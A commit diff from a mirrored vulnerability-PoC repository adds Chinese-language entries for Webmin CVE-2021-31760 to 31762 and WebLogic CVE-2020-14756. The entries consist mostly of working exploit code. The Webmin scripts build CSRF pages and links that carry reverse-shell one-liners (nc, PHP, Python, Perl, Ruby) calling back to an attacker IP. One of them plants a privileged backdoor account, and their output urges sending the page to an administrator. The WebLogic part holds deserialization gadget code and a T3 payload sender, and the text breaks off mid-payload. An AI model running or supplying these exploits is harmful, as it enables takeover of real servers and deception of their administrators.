admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 10:50:23 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞

Browse Source
This commit is contained in:
Threekiii 2022-12-07 15:39:19 +08:00
parent 9acf184afd
commit 56f46b9d98
14 changed files with 1151 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
CMS漏洞/ZZZCMS parserSearch 远程命令执行漏洞.md
View File

@ -4,6 +4,11 @@
ZZZCMS parserSearch 存在模板注入导致远程命令执行漏洞
参考链接:
- https://srcincite.io/advisories/src-2021-0015/
- https://nvd.nist.gov/vuln/detail/CVE-2021-32605
## 漏洞影响
```

9
README.md
View File

@ -287,6 +287,7 @@
* Webmin password_change.cgi 远程命令执行漏洞 CVE-2019-15107
* Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
* Webmin update.cgi 后台远程命令执行漏洞 CVE-2022-0824
* Webmin 多个高危漏洞 CVE-2021-31760~62
* WiseGiga NAS down_data.php 任意文件下载漏洞
* WiseGiga NAS group.php 远程命令执行漏洞
* WSO2 fileupload 任意文件上传漏洞 CVE-2022-29464
@ -434,6 +435,7 @@
* PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381
* Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
* WebLogic Local File Inclusion 本地文件包含漏洞 CVE-2022-21371
* Weblogic Server远程代码执行漏洞 CVE-2020-14756
* Weblogic SSRF漏洞 CVE-2014-4210
* WebLogic T3 反序列化漏洞 CVE-2016-3510
* Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271
@ -500,16 +502,23 @@
* Saltstack 未授权RCE漏洞 CVE-2021-25281~25283
* SaltStack 未授权访问命令执行漏洞 CVE-2020-16846 25592
* Saltstack 远程命令执行漏洞 CVE-2020-11651 11652
* VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973
* VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972
* VMware vCenter 任意文件读取漏洞
* VMware View Planner 未授权RCE CVE-2021-21978
* VMware vRealize Operations Manager SSRF漏洞 CVE-2021-21975
* VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
* VoIPmonitor 远程命令执行漏洞 CVE-2021-30461
* Wazuh Manager 代码执行漏洞 CVE-2021-26814
* Windows Chrome 远程命令执行漏洞
* WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
* WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633
* WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
* WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175
* WordPress File Manager6.9 RCE CVE-2020-25213
* WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
* WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119
* WordPress SuperForms 4.9 任意文件上传到远程代码执行
* WordPress WP_Query SQL 注入漏洞 CVE-2022-21661
* 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
- 网络设备漏洞

486
Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md Normal file
View File

@ -0,0 +1,486 @@
# Webmin 多个高危漏洞 CVE-2021-31760~62
## 漏洞描述
CVE-2021-31760:利用CSRF攻击实现对Webmin的远程命令执行。
CVE-2021-31761:利用XSS攻击实现对Webmin的远程命令执行。
CVE-2021-31762:利用CSRF攻击通过Webmin的添加用户功能创建特权用户然后通过特权用户权限反弹shell。
参考链接:
- CVE-2021-31760https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762https://github.com/electronicbots/CVE-2021-31762
## 漏洞影响
```
Webmin <= 1.973
```
## FOFA
```
app="Webmin"
```
## 漏洞复现
CVE-2021-31760 poc
```python
import time, subprocess,random
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'proc/run.cgi'
else:
target = target + '/proc/run.cgi'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="''' + target +'''" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31761 poc
```python
import time, subprocess,random,urllib.parse
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'tunnel/link.cgi/'
else:
target = target + '/tunnel/link.cgi/'
ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m
\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
file_name = random.randrange(1000)
if ReverseShell == '1':
ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
elif ReverseShell == '2':
ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
elif ReverseShell == '3':
ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
elif ReverseShell == '4':
ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
elif ReverseShell == '5':
ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
else:
print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
def CSRF_Generator():
Payload = urllib.parse.quote('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="/proc/run.cgi" method="POST">
<input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
<input type="hidden" name="mode" value="0" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="input" value="" />
<input type="hidden" name="undefined" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
print(target+Payload)
def Netcat_listener():
print()
subprocess.run(["nc", "-nlvp "+port+""])
def main():
CSRF_Generator()
Netcat_listener()
if __name__ == '__main__':
main()
```
CVE-2021-31762 poc
```python
import time
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()
```

116
Web服务器漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md Normal file
View File

@ -0,0 +1,116 @@
# Weblogic Server 远程代码执行漏洞 CVE-2020-14756
## 漏洞描述
weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞weblogic针对该漏洞的解决方案就是不断填充黑名单在高版本jdk下配合jep290机制实现黑名单在低版本下配合resolveClass进行防御所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。
CVE-2020-14756 这个漏洞的利用比较巧妙通过利用weblogic coherence组件中的类绕过了黑名单机制的检测重新能够利用黑名单中的类造成代码执行。
参考链接:
- https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW
- https://github.com/Y4er/CVE-2020-14756
## 漏洞影响
```
Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
```
## 漏洞复现
CVE_2020_14756.java
```
package com.supeream;
import com.supeream.serial.Serializables;
import com.supeream.weblogic.T3ProtocolOperation;
// coherence-rest.jar
import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
// coherence-web.jar
import com.tangosol.coherence.servlet.AttributeHolder;
// coherence.jar
import com.tangosol.util.SortedBag;
import com.tangosol.util.aggregator.TopNAggregator;
import java.io.File;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
public class CVE_2020_14756 {
public static void main(String[] args) {
MvelExtractor extractor = new MvelExtractor("java.lang.Runtime.getRuntime().exec(\"calc\");");
MvelExtractor extractor2 = new MvelExtractor("");
try {
SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2);
AttributeHolder attributeHolder = new AttributeHolder();
sortedBag.add(1);
Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(sortedBag, extractor);
Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
setInternalValue.setAccessible(true);
setInternalValue.invoke(attributeHolder, sortedBag);
/*
FileOutputStream fileOutputStream = new FileOutputStream(new File("test.ser"));
ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
objectOutputStream.writeObject(attributeHolder);
*/
T3ProtocolOperation.send("192.168.65.128", "7001", Serializables.serialize(attributeHolder));
} catch (Exception e) {
e.printStackTrace();
}
}
}
```
weblogic_t3.py
```py
#!/usr/bin/python
import socket
import os
import sys
import struct
if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7